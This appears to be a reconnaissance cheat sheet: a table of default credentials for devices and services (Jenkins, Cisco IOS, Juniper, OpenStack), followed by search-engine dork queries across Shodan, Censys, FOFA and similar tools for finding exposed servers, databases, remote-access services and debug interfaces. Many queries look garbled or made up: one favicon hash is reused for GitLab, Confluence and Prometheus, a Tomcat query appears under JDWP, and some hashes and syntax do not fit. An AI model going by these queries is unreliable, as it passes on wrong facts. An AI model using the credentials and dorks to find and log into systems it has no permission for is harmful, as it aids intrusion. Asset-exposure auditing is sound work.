Tips and Tricks

Tips and tricks

Default Credential

S/Pusernamepassword

Jenkins

admin

admin

AWS EC2

ec2-user

N/A (use SSH key)

AWS RDS

N/A (use IAM credentials)

N/A (use IAM credentials)

AWS S3

N/A (use IAM credentials)

N/A (use IAM credentials)

Azure VM

azureuser

N/A (use SSH key)

Azure SQL Database

N/A (use Azure AD authentication or SQL Server authentication)

N/A (use Azure AD authentication or SQL Server authentication)

Google Compute Engine

N/A (use project-level SSH key)

N/A (use project-level SSH key)

Google Cloud SQL

N/A (use Cloud SQL Proxy or SSL/TLS certificate)

N/A (use Cloud SQL Proxy or SSL/TLS certificate)

Docker

root

N/A

Kubernetes

N/A

N/A (use Kubernetes authentication mechanisms)

OpenStack

ubuntu

ubuntu

VMware ESXi

root

N/A

Cisco IOS

cisco

cisco

Juniper Junos

root

juniper123

more: https://github.com/ihebski/DefaultCreds-cheat-sheet

Dork

shodancensyssecuritytrailsgreynoisebinaryedgezoomeyeNetlasfofahuntrleakix

Nginx

“nginx” http.component:nginx

“nginx” AND tags:web AND tags:https

http.html_body.server:nginx

service.name:nginx

http.servers:nginx

app:”nginx”

http.server:nginx

title=”nginx” || header=”nginx”

http.servers=”nginx”

server:nginx

Apache

“apache” http.component:apache

“apache” AND tags:web AND tags:https

http.html_body.server:apache

service.name:apache

http.servers:apache

app:”apache”

http.server:apache

title=”apache” || header=”apache”

http.servers=”apache”

server:apache

Phpmyadmin

Server: phpmyadmin

org asn

asn:ASXXXXXXX org:

asn:ASXXXXXXX AND tags:

include:asn:ASXXXXXXX AND type:organization

asn:ASXXXXXXX organization:

asn:ASXXXXXXX organization:

asn:ASXXXXXXX org:

asn:ASXXXXXXX org:

header=”ASXXXXXXX” && title=” "

asn:ASXXXXXXX organization:

asn:ASXXXXXXX org:

elasticsearch

product:elasticsearch

elasticsearch.protocol:tcp

os:elasticsearch

port:9200

elasticsearch

app:”Elasticsearch” port:”9200”

product:”Elasticsearch”

title=”Elasticsearch” || body=”Elasticsearch” || header=”Elasticsearch”

product:”elasticsearch”

title:”kibana” && title:”elastic”

Minio

http.html:” “

(443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names: minio.*)

ssl.cert_subject_alt_name: minio

metadata.product: “MinIO”

“http.component:Minio” OR “http.title:Minio”

title:Minio

http.title:”Minio”

title=”MinIO” || header=”Minio” || header=”X-Amz-Bucket-Region”

intitle:”MinIO”

intitle:”MinIO”

kuberneties

“kubernetes port:6443”

“443.https.get.body: “kubernetes””

“kubernetes.*.cloudapp.azure.com”

“tags:kubernetes”

“title:”kubernetes-dashboard””

“app:”kubernetes-dashboard””

“app:”kubernetes-dashboard””

“title=”Kubernetes Dashboard” || header=”kubernetes””

“title:”kubernetes dashboard””

“title:”Kubernetes Dashboard””

mssql

product:”Microsoft SQL Server”

443.https.get.body:”microsoft sql server” OR 1433.banner:”microsoft sql server”

http.html_content:”Microsoft SQL Server” OR http.html_content:”MSSQLSERVER”

tags:”mssql” OR tags:”microsoft sql server”

product:”Microsoft SQL Server”

app:”Microsoft SQL Server”

title:”Microsoft SQL Server” OR body:”Microsoft SQL Server” OR body:”MSSQLSERVER”

title=”Microsoft SQL Server” || header=”Microsoft SQL Server”

title:”Microsoft SQL Server” OR body:”Microsoft SQL Server”

server:Microsoft-IIS/8.5 intitle:”sql server login”

rdp

“rdp” OR “port:3389”

3389.rdp.banner:”\x03\x00\x00\x0b\xe0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00”

“rdp” AND port:3389

“tags.rdp” OR “tags.mstsc”

“rdp” AND port:3389

“rdp” OR “port:3389”

“rdp” OR “port:3389”

“protocol=rdp” OR “port=3389”

“rdp” OR “port:3389”

“rdp” OR “port:3389”

ftp

“ftp”

“service.ftp.banner”

“service:ftp”

“protocol:ftp”

“ftp”

“ftp”

“ftp”

“protocol==ftp”

“ftp”

“ftp”

ssh

port:22 ssh

22.ssh.banner.raw_version: SSH

22 || ssh

/ssh/ && port:22

ssh port:22

port:22 ssh

port:22 AND service.ssh==true

protocol=ssh

22.ssh.banner.raw_version:SSH

service.ssh == true

dns

hostname:{DNS name}

parsed.names: {DNS name}

domain:{DNS name}

metadata.dns: {DNS name}

dns.name:{DNS name}

site:{DNS name}

dns.host: {DNS name}

domain={DNS name}

domain:{DNS name}

data.hostnames: {DNS name}

modbus

port:502 modbus

modbus

port:502

modbus

port:502

port:502 modbus

port:502 modbus

protocol=modbus

port:502

port:502 modbus

rtsp

port:554 rtsp

protocols: rtsp

port:554

protocols:rtsp

port:554 rtsp

port:554 rtsp

protocol:rtsp

protocol=rtsp

protocol:rtsp

port:554

SMTP

smtp

protocols:smtp

smtp

port:25

port:25

service:smtp

service:smtp

protocol==smtp

smtp

port.tcp eq 25

SMB

smb

protocols.smb.banner.signatures.name: “SMB”

tags.smb = true

metadata.protocol = smb

protocols:”smb”

app:”SMB/CIFS”

service:”smb”

protocol=”smb”

tags:”smb”

protocol:smb

NFS

port:2049 nfs

protocols:”nfs”

port:2049 AND service:nfs

tag:nfs

port:2049 nfs

app:”nfsd”

nfs

title=”NFS” || body=”NFS” || header=”NFS” || keyword=”NFS”

port:2049 AND service:nfs

port:2049 nfs

Docker registries

http.title:”Docker Registry”” OR “http.html:”Docker Registry”” OR “http.component:”docker”” OR “http.component:”registry”

443.https.get.metadata.protocol: Docker

http.headers.server: docker-registry” OR “http.html: docker-registry” OR “http.title: docker-registry

http.metadata.product: Docker Registry

http.component:docker-registry

title:”Docker Registry”” OR “body:”Docker Registry”

product:”Docker Registry”

title=”Docker Registry”” OR “header=”docker-registry”” OR “body=”docker-registry”

docker-registry

http.component:”docker-registry”

memcached

port:11211 memcached

protocols: “memcached”

type:server “memcached” port:11211

service:memcached

port:11211 && memcached

port:”11211” memcached

port:11211 && memcached

title=”Memcached” && protocol=”port:11211”

port: 11211 AND tags: memcached

protocols:”memcached” port:”11211”

RabbitMQ

product:rabbitmq

443.https.get.body:/{“product”:”RabbitMQ”,”version”:”

http.html: /management/rabbitmq/

port:5672 (RabbitMQ) AND tags:RabbitMQ

title:”RabbitMQ Management”

app:”RabbitMQ Management”

port:5672 AND product:rabbitmq

title=”RabbitMQ Management” || body=”RabbitMQ” || header=”RabbitMQ”

port:5672 AND service.name:rabbitmq

product:rabbitmq

WinRM

product:winrm

protocols:winrm

os:windows winrm

winrm

winrm

port:5985 winrm

service:WinRM

protocol==winrm

winrm

winrm

CouchDB

couchdb port:5984

protocols: “couchdb” and port: 5984

http.component: “couchdb” and port: 5984

http.server: “CouchDB” and port: 5984

protocols:couchdb and port:5984

app:”CouchDB” and port:5984

port:5984 and app:couchdb

title=”couchdb” && port=5984

couchdb inurl:5984

app:couchdb && port:5984

PostgreSQL

port:5432 postgres

443.versions.protocol: “PostgreSQL” or 5432.versions.protocol: “PostgreSQL”

pgsql-server

port:5432

service:”postgresql”

port:”5432”

title:”pgAdmin” OR title:”PostgreSQL” OR title:”pgAdmin 4” OR title:”pgAdmin 3”

title=”Adminer” || body=”pgsql” || body=”PostgreSQL”

title:”postgresql” OR body:”postgresql”

pgsql-server

Gitlab

http.favicon.hash:-335242539 “gitlab”

443.https.get.metadata.server: GitLab

http.headers.server:”gitlab”

metadata.service:gitlab

title:”GitLab” && protocols:”https”

title:”GitLab”

http.favicon.hash:-335242539 “gitlab”

title=”GitLab”

title=”GitLab”

title=”GitLab”

SVN

Server: Apache SVN

tags: svn

svn

/svn/index.cgi

title:”viewvc” svn

port: 3690 svn

os:svn

title=”ViewVC” || title=”SVN repository browser” || title=”VisualSVN Server” || body=”Powered by Subversion version”

svn

svn

Tomcat

tomcat country:XX

protocols: “http” and “product:Apache Tomcat”

http.web_server.name:”Apache Tomcat”

metadata.product:tomcat

http.server.product:”Apache Tomcat”

app:”Tomcat”

product:Tomcat

title=”Apache Tomcat” || body=”Apache Tomcat”

http.favicon.hash: -1448465410 && http.html: “Apache Tomcat”

os.query:”Apache Tomcat”

VNC

“vnc” port:5900

port: “5900” AND “VNC protocol”

“vnc” AND port:5900

“vnc” -port:5900

protocol:”vnc” AND port:5900

port:5900 AND app:”RealVNC”

service:”vnc” port:”5900”

port=”5900” && protocol=”vnc”

vnc AND port:5900

“vnc” port:5900

LDAP

“ldap” port:389 or port:636

tags: ldap

service:ldap

tag:ldap

service:”LDAP (389/tcp)” or service:”LDAP SSL (636/tcp)”

app:”openLDAP” or app:”ActiveDirectory”

service.ldap.banner:”ldap”

protocol==LDAP

service:ldap

port:389 or port:636

NetBIOS

port:”137” org:”" or netbios_name:""

protocols: “netbios-ssn” or netbios.name: “"

netbios_host: or netbios_host:

netbios

netbios.domain: “" or netbios.host:

netbios.name: or netbios.ip:

netbios.host:

protocol=”NetBIOS” && cert=””

netbios

netbios

TeamViewer

product:teamviewer

443.versions.banner:TeamViewer

os:’Windows 7’ && port:5938 && app:’TeamViewer’

metadata.teamviewer.enabled:true

product:’TeamViewer’ && type:’host’

app:teamviewer

teamviewer

title=”TeamViewer” || header=”TeamViewer”

service:”TeamViewer”

port.tcp eq 5938 and port.tcp eq 443 and product eq ‘TeamViewer’

NoMachine

“nomachine” port:4000, “nomachine” port:4010, “nomachine” port:4011, “nomachine” port:4022

“nomachine” and port:4000 or port:4010 or port:4011 or port:4022

service:”nomachine” and (port:4000 or port:4010 or port:4011 or port:4022)

“nomachine” port:4000 or port:4010 or port:4011 or port:4022

service:nomachine and (port:4000 or port:4010 or port:4011 or port:4022)

app:”NoMachine” port:4000 or port:4010 or port:4011 or port:4022

service:”nomachine” and (port:”4000” or port:”4010” or port:”4011” or port:”4022”)

title=”NoMachine” && (port=4000 || port=4010 || port=4011 || port=4022)

nomachine AND (port:4000 OR port:4010 OR port:4011 OR port:4022)

tags.nomachine AND (ports:4000 OR ports:4010 OR ports:4011 OR ports:4022)

vCenter

“vCenter” port:443

443.https.get.metadata.product:VMware-vCenter-Server

http.title:”vCenter Server”

tags:”vmware-vcenter”

title:”vSphere Client”

app:”VMware vSphere”

http.html_contains:”vmware-vsphere-client”

title=”VMware vCenter Server” || body=”vCenter Server” || header=”vCenter Server”

service.name:VMware-vSphere

product:”VMware vCenter Server”

ESXi

product:ESXi

os: vmware_esxi

os:’VMware ESXi’

tag:VMware-ESXi

os:’VMware ESXi’

webapp:VMware ESXi

os:VMware ESXi

title=’VMware ESXi’

service.name:VMware ESXi

product:’VMware ESXi’

directory listings

“Server: -frontier -akamai -edgecast -fastly -incapsula -nginx -squarespace -cdn -amazonaws -cloudfront -gstatic -github”

“protocols: http and 200.status_code:/2[0-9][0-9]/ and body: “Index of /” and not (body: “HTTP/1.1 301” or body: “HTTP/1.1 302” or body: “HTTP/1.1 303” or body: “HTTP/1.1 307” or body: “HTTP/1.1 308”)”

http.title:/index of/i

metadata.product:apache && metadata.title:/index of/i

http.html.body:/Index of/i && http.status.code:200

web.title:/index of/i

http.title:/index of/i

title=”Index of /” && protocol=”http” && status_code=”200”

http.body:/index of/i && http.status_code:200

title:”Index of /” && protocol:http

SOCKS

“socks” port:1080

“socks” AND port:1080

port:1080 AND protocol:socks5

“socks” AND port:1080

“SOCKS5” AND port:1080

“SOCKS5” && port:”1080”

“SOCKS” port:”1080”

“SOCKS5” && port=”1080”

“SOCKS5” port:1080

protocol:SOCKS5 port:1080

V2Ray

v2ray

tags.v2ray

v2ray

v2ray

v2ray

v2ray

v2ray

protocol==”v2ray”

v2ray

v2ray

Squid

http.component: squid

80.http.get.headers.server: squid

HTTP.headers.server: squid

http.server_header: squid

http.component: squid

app:Squid

http.component.product: squid

title=”Squid Cache” && protocol=”http” && port=3128

Squid proxy server” OR “Squid proxy cache

intext:”Squid Object Cache”

PRTG

product:prtg port:80” or “product:prtg port:443

443.https.get.body: ‘PRTG Network Monitor’” or “80.http.get.body: ‘PRTG Network Monitor’

text:’PRTG Network Monitor’ AND port:80” or “text:’PRTG Network Monitor’ AND port:443

http.user_agent: ‘PRTG’ OR http.title: ‘PRTG’

product:PRTG” or “body:PRTG Network Monitor

app:PRTG Network Monitor” or “header.server:PRTG Network Monitor

“prtg” or “prtg network monitor”

“title=”prtg” || body=”prtg”” or “protocol=”http” && body=”prtg””

“prtg” or “prtg network monitor”

“product:PRTG” or “PRTG Network Monitor”

WebDAV

Server: Microsoft-IIS/7.5 intitle: “WebDAV” OR “WebDAV MiniRedir”

80.http.get.headers.server: Microsoft-IIS/7.5 && title:”WebDAV MiniRedir”

http.headers.server:/Microsoft-IIS/7.5/ && title:”WebDAV MiniRedir”

80.http.get.headers.server: Microsoft-IIS/7.5 && title:”WebDAV MiniRedir”

http.server: Microsoft-IIS/7.5 && html.title: “WebDAV MiniRedir”

server:Microsoft-IIS/7.5 && title:”WebDAV MiniRedir”

http.server: Microsoft-IIS/7.5 && http.title: “WebDAV MiniRedir”

“title=”WebDAV” && header=”Microsoft-IIS/7.5”

http.title:”WebDAV” && http.headers.server:”Microsoft-IIS/7.5”

http.title: “WebDAV” && http.headers.server: “Microsoft-IIS/7.5”

IIS

“Server: Microsoft-IIS” OR “Server: Microsoft-HTTPAPI”

“443.https.get.title: IIS” OR “80.http.get.title: IIS”

“http.headers.server: Microsoft-IIS” OR “http.headers.server: Microsoft-HTTPAPI”

“http.server: Microsoft-IIS” OR “http.server: Microsoft-HTTPAPI”

“server: Microsoft-IIS” OR “server: Microsoft-HTTPAPI”

“webapp=”IIS”” OR “webserver=”IIS””

“http.favicon.hash:-1137975641 AND http.server:”Microsoft-IIS”” OR “http.favicon.hash:-1137975641 AND http.server:”Microsoft-HTTPAPI””

“protocol==http && header==”Server: Microsoft-IIS”” OR “protocol==http && header==”Server: Microsoft-HTTPAPI””

“iis” OR “microsoft-iis”

“http.server.name: Microsoft-IIS” OR “http.server.name: Microsoft-HTTPAPI”

Redis

port:6379 product:redis

ports: “6379” AND tags.raw: “redis”

(“redis” AND port:6379)

redis.server

protocols:”redis” -os:”Windows”

redis port:6379

service:redis port:6379

title=”Redis” && protocol=”redis”

port:”6379” AND protocol:”redis”

port:6379 AND Redis

Cisco Smart Install

Server: Cisco-SMI

443.issmartinstall:true

fingerprint: “Device Type: Cisco Smart Install Client”

/cgi-bin/discovery/

title:Cisco Smart Install - Configuration Assistant

product:Cisco Smart Install

title:Cisco Smart Install

header=’X-Remote-Addr’ && title=’Cisco Smart Install’

http.favicon.hash:-1300641209 && http.title:’Cisco Smart Install’

product:Cisco Smart Install

InfluxDB

“InfluxDB” port:8086

(open_influxdb.port: 8086)

http.title:”InfluxDB Admin”

“influxdb” -service.version:1.8

http.component:influxdb

title:”InfluxDB” port:8086

port:8086 service:InfluxDB

title=”InfluxDB” || body=”InfluxDB”

type:service InfluxDB

server:”InfluxDB”

Cassandra

“cassandra” port:9042

“cassandra” AND port:9042

port:9042 AND “cassandra”

“cassandra” AND tags:{“cassandra”}

“cassandra” AND port:”9042”

“cassandra” port:”9042”

“cassandra” port:9042

title=”cassandra” && port=9042

“cassandra” AND port:”9042”

“cassandra” AND port:”9042”

GlusterFS

“GlusterFS”

443.versions = “GlusterFS”

GlusterFS

http.favicon.hash:-434599080 “gluster”

service.glusterfs.banner: “GlusterFS”

app:”GlusterFS”

http.favicon.hash:-434599080 “gluster”

title=”Gluster Management Console” || body=”GlusterFS” || header=”Gluster”

title:”GlusterFS Management Console”

service:/glusterfs/

Hadoop

“hadoop” port:”50070” or “hadoop” port:”8088”

product:Hadoop

“os:Linux” “hadoop”

“50070” || “8088” && “hadoop”

“hadoop” in_service:”50070, 8088”

“hadoop” port:”50070” or “hadoop” port:”8088”

service.name:hadoop

title=”Hadoop NameNode”” or “title=”Hadoop Resource Manager”

title:”hadoop cluster overview”

hadoop

Fortigate

http.favicon.hash:728337045 && title:”Fortinet - Login”

443.https.get.title:”Fortinet”

http.html:”Fortinet”

port:443 http.html:”FortiGate”

title:”Fortinet FortiGate”

title:”Fortinet FortiGate Login”

http.title:”FortiGate”

title=”Fortinet FortiGate Login” || header=”Fortinet” || body=”Fortinet”

fortigate

JDWP

jdwp country:”" port:"8000"

443.jdwp

(“java.debugwire”)

jdwp

jdwp

app:”JDWP-Debug-Interface”

port=8000 protocol=TCP service=JDWP

title=”Apache Tomcat”

jdwp

IPsec

“ikev2.probe(500)” or “ikev2.probe(4500)” or “ipsec.probe()”

“protocols: ‘ikev2’ or protocols: ‘ipsec’”

“ikev2” or “ipsec”

“port:500 or port:4500 or port: 1701 and tags:ipsec”

“protocols:ikev2 or protocols:ipsec”

“ipsec” or “ikev2”

“ikev2” or “ipsec”

“title=”Fortinet Firewall Login” && body=”/remote/login” && body=”/tmui/login.jsp/” && body=”/remote/login?lang=en” && body=”/remote/login?lang=en_US” && body=”/remote/login?lang=es” && body=”/remote/login?lang=es_US””

“service.name:”IPSec”” or “service.name:”IKEv2””

“protocol:ipsec” or “protocol:ikev2”

Splunkd

product:splunkd

443.https.get.metadata.product: Splunkd

http.html: /en-US/splunkd/

metadata.splunkd.server != null

product: Splunkd

app:Splunk

Splunkd

title=”Splunk” && header=”Splunkd”

title:splunkd

splunkd

Android Debug Bridge

“Android Debug Bridge” port:5555

80.http.get.headers.server:”Android Debug Bridge”

server:adb

metadata.service == “adb”

service:”android debug bridge (adb)”

app:”Android Debug Bridge”

http.component:”Android Debug Bridge”

app=”Android Debug Bridge” || header=”Android Debug Bridge”

http.headers.server:”Android Debug Bridge”

http.server.version:”Android Debug Bridge”

OpenCTI

http.favicon.hash:-1693683099

443.https.tls.certificate.parsed.extensions.authority_key_id:0a11b3211d2e25545ed61a568a78545c

app=nginx port:443

80.http.get.body.sha256:8f2c29dbae3b1cbbe10d59d8ed144c5999329fa974aa06f529ee550dc6341e2c

http.component:nginx

title:’OpenCTI’

ssl://title:OpenCTI

title=”OpenCTI” || header=”X-Opencti-Path” || header=”X-Opencti-User”

Server: nginx intitle:”OpenCTI”

title:”OpenCTI”

Wazuh

wazuh auth_token” or “title:Wazuh

443.https.get.body_sha256:XV8WbTtTSPBOnQ2R26dA9XFeOXXz0vVdNllZlf0u0LQ

generic.server:Wazuh

metadata.product:wazuh

wazuh

title:Wazuh

Wazuh

app=”Wazuh”

wazuh

app:wazuh

Vault

“Vault Server” port:8200

443.https.tls.certificate.parsed.extensions.subject_alt_name: .vault

ssl.cert_subject_alt_name: .vault

http.html_hash:3896359815

html:” “

title:”Vault”

title:”Vault”

title=”Vault” && port=8200

title:”Vault”

“vault” port:8200

Rocket.Chat

product:”Rocket.Chat”

443.https.get.metadata.software:Rocket.Chat

http.html_body:”Rocket.Chat”

http.user_agent:”Rocket.Chat”

http.favicon.hash:-1788329738

title:”Rocket.Chat”

title:”Rocket.Chat”

title=”Rocket.Chat”

title:”Rocket.Chat”

http.title:”Rocket.Chat”

Mattermost

http.favicon.hash:1565243809

443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names:mattermost.*

https.cert.subject.common_name:mattermost.*

metadata.product: mattermost

protocols:https && service.metas.product:mattermost

app:”Mattermost”

http.url.path:/api/v4/users

title=”Mattermost” || header=”mattermost”

body:”content”:”Mattermost”

https://leakix.net/search?query=mattermost

Gitter

title:”gitter” http.component:”gitter”

443.https.tls.certificate.parsed.names: “gitter.im”

“gitter.im”

http.user_agent:”Mozilla/5.0 (compatible; Gitter)” or http.user_agent:”com.gitter”

http.component:Gitter or ssl.cert.issuer.cn:gitter

title:”Gitter” or header:”X-Powered-By: Gitter”

host:gitter.im

title=”Gitter” || domain=”gitter.im”

title:”Gitter”

domain:gitter.im

Confluence

title:”Dashboard - Confluence” http.favicon.hash:-335242539 “X-ASEN” -gitlab

443.https.tls.certificate.parsed.subject.common_name:”*.atlassian.net” and 443.https.tls.certificate.parsed.subject.organization:Atlassian

http.html: /loginpage.action/i and http.html: /forgotlogin/

http.server:Apache-Coyote/1.1 http.title:Confluence

title:”Dashboard - Confluence” and protocols:https

app:”Confluence-Atlassian”

http.favicon.hash:-335242539 title:”Dashboard - Confluence”

title=”Dashboard - Confluence”

title:”Log in - Confluence”

title:”Log in - Confluence”

Jira

“Jira” port: 80, 443, 8080, 8443

“Jira” AND protocols: (“80/http” OR “443/https” OR “8080/http-proxy” OR “8443/https-alt”)

“jira” OR “atlassian” OR “jira.example.com” OR “atlassian.example.com”

metadata.product:jira

title:”JIRA - Login” OR body:”powered by Atlassian JIRA”

app:”Jira”

“jira” AND protocols: (“http” OR “https”)

title=”Jira - Login” || header=”atlassian” || domain=”atlassian.net” || domain=”atlassian.com”

“jira” OR “atlassian”

product:”jira” OR app:”jira”

Element Matrix

product:”Element Matrix Server”

443.https.get.title:”Element Matrix Services”

http.html_title:”Element Matrix Services”

http.html_title:”Element Matrix Services”

title:”Element Matrix Services”

app:”Element Matrix Services”

app:”Element Matrix Services”

title=”Element Matrix Services”

title:”Element Matrix Services”

title:”Element Matrix Services”

SonarQube

product:”SonarQube” port:”9000”

443.https.get.title:”SonarQube”

http.title:”SonarQube”

http.html_title:”SonarQube”

http.title:”SonarQube”

title:”SonarQube”

title:”SonarQube”

title=”SonarQube”

SonarQube

intext:”sonarqube” AND intext:”rights reserved”

Portainer

port:9000 portainer

443.https.get.headers.server: portainer

http.html: “Portainer” && http.url: “/api/status”

http.request.method: GET && http.request.uri.path: /api/status && http.response.body: Portainer

http.component:portainer && http.component_category: application

app:”Portainer” && port:”9000”

port:9000 AND service:portainer

title=”Portainer” && header=”Powered by Portainer” && protocol=”https”

title:”Portainer”

title:”Portainer”

Terraform

product:terraform

terraform

terraform

product:terraform

product:terraform

app:terraform

product:terraform

title=”Terraform Enterprise” || header=”Terraform-Backend”

terraform

terraform

DefectDojo

product:DefectDojo

443.https.get.body_sha256:53cfb82d5b321381f08a4a32d3b4e4b82fb8a79c0b54d3e0f9431b3737ebea88

http.html_hash:53cfb82d5b321381f08a4a32d3b4e4b82fb8a79c0b54d3e0f9431b3737ebea88

metadata.product:DefectDojo

http.html.hash.sha256:53cfb82d5b321381f08a4a32d3b4e4b82fb8a79c0b54d3e0f9431b3737ebea88

title:”DefectDojo” || body:”DefectDojo”

app.name:”DefectDojo”

title=”DefectDojo”

http.html_hash:53cfb82d5b321381f08a4a32d3b4e4b82fb8a79c0b54d3e0f9431b3737ebea88

http.html_hash:53cfb82d5b321381f08a4a32d3b4e4b82fb8a79c0b54d3e0f9431b3737ebea88

Zabbix

zabbix

product:zabbix

zabbix

zabbix

zabbix

zabbix

zabbix

title=”Zabbix” || body=”Zabbix”

Zabbix

Zabbix

Sentry

Server: Sentry

443.https.get.body_sha256: contains c0b207c6b18d6a12a6d740f328d137a23972915f6c3e3e3a6f79d125d9ba9522

app: Sentry

http.user_agent: sentry*

http.favicon.hash: 1103164611

app:Sentry

title:Sentry

title=sentry

process_name:sentry*

product:Sentry

Grafana

grafana

443.https.get.title:grafana

https.html_title:”Grafana”

http.useragent:”Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36” http.html_title:”Grafana”

port:3000 title:”Grafana”

app:grafana

http.title:grafana

title=”Grafana” || header=”grafana” || body=”grafana”

https://grafana.*

grafana

Nagios

“Nagios/HTTP” or “Nagios Core” or “Nagios XI”

“nagios” or “http.favicon.hash:-1301254336” and “http.title:Nagios Core”

“nagios” or “http.html_hash:1875409680”

Nagios

title:”Nagios Core”

app:Nagios

http.html: “Nagios Core”

title=”Nagios Core” || body=”Nagios Core”” or “title=”Nagios XI” || body=”Nagios XI”

Nagios

Nagios

Nextcloud

nextcloud

443.https.get.body_sha256:65db03f60e82d7c34a6b9455948f975931c90476e90e408d20f2af2db4699f25

nextcloud

http.html_body:nextcloud

product:”Nextcloud”

title:”Nextcloud”

http.favicon.hash:-575579963

title=”Nextcloud” || header=”Nextcloud” || html=”Nextcloud”

nextcloud

https://$DOMAIN/ocs/v2.php/apps/notifications/api/v1/notifications

ZooKeeper

zookeeper

443.ports and product:zookeeper

service.name: zookeeper

tags: zookeeper

protocols: ‘zookeeper’

app:ZooKeeper

service:’zookeeper’

app=”ZooKeeper”

title:”ZooKeeper”

product:zookeeper

Microsoft Exchange

“microsoft exchange” port:25

80.http.get.title:exchange

“microsoft exchange” in:hostname

service:smtp app:”Microsoft Exchange”

“microsoft exchange” port:25

“Microsoft Exchange Server” port:”25”

“Microsoft Exchange” port:25

title=”Outlook Web App”

“microsoft exchange” port:25

app:”Microsoft Exchange” port:”25”

Skype for Business

“skype for business” port:5061

“skype for business” AND port:5061

service.name:”skype” AND service.name:”tls” AND service.port:5061

“skype for business”

Microsoft Skype for Business Server 2015” OR “Microsoft Skype for Business Server 2019

app:”skype for business

skype for business” AND port:5061

title=”Skype for Business”

skype for business

skype for business

Microsoft Teams

product:Microsoft Teams

443.https.get.metadata.server: Microsoft-IIS/10.0 AND 443.https.tls.certificate.parsed.subject.organization:Microsoft Corporation AND 443.https.tls.certificate.parsed.subject.organizational_unit:Microsoft Teams

dns.nameservers:*.teams.microsoft.com

http.user_agent:teams AND tags.service:Teams

protocols:’microsoft-teams’

app:’Microsoft Teams’

microsoft teams

title=”Microsoft Teams” || body=”Microsoft Teams”

Microsoft Teams

Microsoft Teams

Celery

“celery” http.component:”celery”

celery

celery

celery

celery

celery

celery

“title=c”elery” || body=c”elery””

celery

celery

RabbitMQ

product:rabbitmq

443.https.get.body:”RabbitMQ” or 8883.tls.tls.certificate.parsed.extensions.authority_key_identifier.0.key_identifier:”RabbitMQ Server”

ssl_certificate.subject.common_name:rabbitmq*

metadata.product:rabbitmq

protocols:”amqp” && product:”RabbitMQ”

app:”RabbitMQ Management”

title:”RabbitMQ Management”

title=”RabbitMQ Management” || body=”RabbitMQ” || header=”RabbitMQ”

title:”RabbitMQ Management”

http.component:RabbitMQ

Kafka

org.apache.kafka.common.security.authenticator” http.component:”http” -“303”

metadata.protocol: “Kafka”

http.title:”kafka” OR http.title:”Apache Kafka” OR http.body:”kafka” OR http.body:”Apache Kafka”

“org.apache.kafka.common.security.authenticator” http.component:”http” -“303”

“kafka” OR “Apache Kafka”

“Kafka” OR “Apache Kafka”

org.apache.kafka.common.security.authenticator” http.component:”http” -“303”

title=”Kafka” OR header=”Apache Kafka”

org.apache.kafka.common.security.authenticator” http.component:”http” -“303”

org.apache.kafka.common.security.authenticator” http.component:”http” -“303”

OpenStack

openstack

openstack

openstack

openstack

openstack

openstack

openstack

openstack

openstack

app=”openstack”

SaltStack

Server: SaltStack

product:SaltStack

http.favicon.hash:-1102536065 AND http.html_hash:1540850741

os:saltstack

title:”SaltStack Enterprise”

SaltStack

SaltStack

title=”SaltStack” || body=”SaltStack” || header=”SaltStack”

saltstack

title:saltstack

OpenShift

Server: openshift

openshift

openshift

service.openshift

title:”openshift web console login”

app:openshift

openshift

title=”OpenShift Web Console” || body=”Powered by OpenShift”

openshift

openshift

Ceph

“ceph” port:6789

(443.ceph.cluster_name:) OR (7480.ceph.cluster_name:) OR (80.ceph.cluster_name:*)

“Ceph” OR “Ceph dashboard”

“Ceph MON” OR “Ceph OSD” OR “Ceph RadosGW”

“ceph” AND open_ports:6789

“ceph” port:”6789”

“Ceph” OR “Ceph dashboard”

“title=”Ceph” || body=”Ceph” || h1=”Ceph””

“title:Ceph” OR “intext:Ceph” OR “h1:Ceph”

ceph

Swagger

title:”swagger ui” or title:”swagger” http.favicon.hash:-1840653542

443.https.get.body.tags.name:”swagger-ui” or 443.https.get.body.tags.name:”swagger”

http.title:”swagger ui” or http.title:”swagger”

metadata.service_name:”swagger-ui” or metadata.service_name:”swagger”

title:”swagger ui” or title:”swagger”

title:”swagger ui” or title:”swagger”

title:”swagger ui” or title:”swagger”

title=”Swagger” || title=”Swagger UI”

body:”swagger-ui” or body:”swagger”

title:”swagger ui” or title:”swagger”

Prometheus

http.favicon.hash:-335242539 ‘Prometheus Time Series Collection and Processing Server’

product:prometheus

http.headers.server:prometheus

http.useragent:’prometheus’

http.favicon.hash:-335242539 AND http.server.header:’prometheus’

app:’Prometheus’ header:’Prometheus’ product:’Prometheus’

http.favicon.hash:-335242539 http.headers.server:prometheus

header=Prometheus” OR “body=Prometheus

http.favicon.hash:-335242539 AND http.server.header:’prometheus’

http.favicon.hash:-335242539 AND http.response.body:Prometheus

Redmine

http.component:”redmine” && http.title:”Redmine”

443.https.get.metadata.product: “Redmine”

http.html: “Redmine” OR http.html: “Redmine - Error”

port: 80, 443 && http.get.body:”Redmine” OR http.get.body:”Redmine - Error”

http.html:”Redmine” OR http.html:”Redmine - Error”

title:”Redmine”

title:”Redmine”

title:”Redmine”

http.html:”Redmine” OR http.html:”Redmine - Error”

product:Redmine

DokuWiki

http.component:dokuwiki

443.https.get.metadata.server: DokuWiki

http.html: dokuwiki

http.server.metadata.product: dokuwiki

http.component:dokuwiki

app:”DokuWiki”

http.favicon.hash: 682090857 AND http.html: “dokuwiki”

title=”DokuWiki” || header=”DokuWiki”

product: DokuWiki

title:”dokuwiki” || body:”dokuwiki” || pageHash:”dokuwiki”

Jenkins

“Server: Jetty” “X-Jenkins”

“Jenkins” AND “200 OK”

“jenkins” OR “jenkins-ci”

“tags.jenkins” OR “http.component:jenkins”

“title:Jenkins” OR “body:Jenkins”

app:Jenkins

service.name:jenkins

body.includes=Jenkins” OR “title.includes=Jenkins

“http.favicon.hash:118356961” OR “http.headers.server:Jetty(.*)(Jenkins|jenkins)”

“intext:Jenkins intitle:Dashboard” OR “inurl:jenkins intitle:login”

Bamboo

“Bamboo” port:8085

(443.https.tls.certificate.parsed.names: “bamboo” AND 443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names: “bamboo”) OR 8085.banner: “Atlassian Bamboo”

http.useragent:”Atlassian HttpClient” http.uri.path:”/bamboo/”

